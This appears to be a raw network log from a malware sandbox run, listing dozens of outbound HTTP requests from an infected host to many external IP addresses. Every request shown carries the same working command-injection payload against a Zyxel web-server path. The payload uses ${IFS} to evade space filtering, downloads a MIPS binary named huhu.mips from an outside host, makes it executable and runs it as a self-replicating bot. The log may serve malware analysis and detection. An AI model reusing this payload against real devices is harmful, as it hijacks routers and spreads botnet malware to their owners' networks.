                                            Feb 2, 2024 06:21:31.009778023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9225192.168.2.1557658147.121.27.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009841919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9226192.168.2.154991678.0.237.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009840965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9227192.168.2.154073246.86.64.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009901047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9228192.168.2.1553396126.113.83.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009912968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9229192.168.2.1551376145.151.14.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009951115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9230192.168.2.153789444.54.132.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.009977102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9231192.168.2.1549206171.162.1.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010015011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9232192.168.2.1541958213.59.236.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010049105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9233192.168.2.1544420161.199.250.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010090113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9234192.168.2.1555746146.149.97.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010139942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9235192.168.2.1544132107.22.249.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010180950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9236192.168.2.1535850165.117.228.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010222912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9237192.168.2.1548886171.24.74.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010257006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9238192.168.2.1537980212.214.37.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010288954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9239192.168.2.154870824.240.120.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010356903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9240192.168.2.155479886.77.97.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010404110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9241192.168.2.154417647.61.13.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010441065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9242192.168.2.154478478.111.42.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010478020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9243192.168.2.154332414.205.145.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010533094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9244192.168.2.1554662184.147.4.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010581970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9245192.168.2.1546074222.9.178.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010602951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9246192.168.2.1546548112.54.227.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010646105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9247192.168.2.1546798163.133.67.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010679007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9248192.168.2.155231064.43.95.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010734081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9249192.168.2.154163474.120.42.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010761976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9250192.168.2.1544080200.133.124.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010797024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9251192.168.2.1555246219.179.208.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010828018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9252192.168.2.155008096.84.72.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010878086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9253192.168.2.153624249.219.40.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010914087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9254192.168.2.153656887.233.62.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010937929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9255192.168.2.154460448.227.212.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.010981083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9256192.168.2.1542340154.63.78.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011025906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9257192.168.2.154111012.27.182.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011054039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9258192.168.2.154955074.152.72.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011105061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9259192.168.2.154640883.45.13.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011151075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9260192.168.2.1539218143.34.225.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011189938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9261192.168.2.1536606205.1.11.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011219978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9262192.168.2.1559252222.213.105.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011264086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9263192.168.2.1543846132.69.139.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011321068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9264192.168.2.1555004181.48.95.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011372089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9265192.168.2.155021677.96.110.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011403084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9266192.168.2.153908444.200.68.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011435032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9267192.168.2.1558272153.1.103.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011456966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9268192.168.2.15359241.120.247.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011517048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9269192.168.2.1540816197.52.249.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011550903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9270192.168.2.154531087.207.49.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011583090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9271192.168.2.154255693.40.10.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.011646986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9272192.168.2.155466651.166.254.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.015332937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9273192.168.2.1554906196.107.118.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:31.015383005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9274192.168.2.153360296.105.35.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023469925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9275192.168.2.154599890.219.190.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023504019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9276192.168.2.1537736128.28.141.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023531914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9277192.168.2.1555012106.88.162.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023585081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9278192.168.2.1560848130.227.100.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023600101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9279192.168.2.155499840.160.196.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023633003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9280192.168.2.154083857.121.86.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023675919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9281192.168.2.1544514121.62.13.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023731947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9282192.168.2.155767820.188.46.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023792982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9283192.168.2.155216047.158.166.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023827076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9284192.168.2.1532828171.94.134.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023870945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9285192.168.2.15343204.77.27.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023900032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9286192.168.2.1543682130.73.147.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.023952961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9287192.168.2.15436225.12.189.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:32.024020910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9288192.168.2.1544166216.75.77.191443
                                            TimestampBytes transferredDirectionData
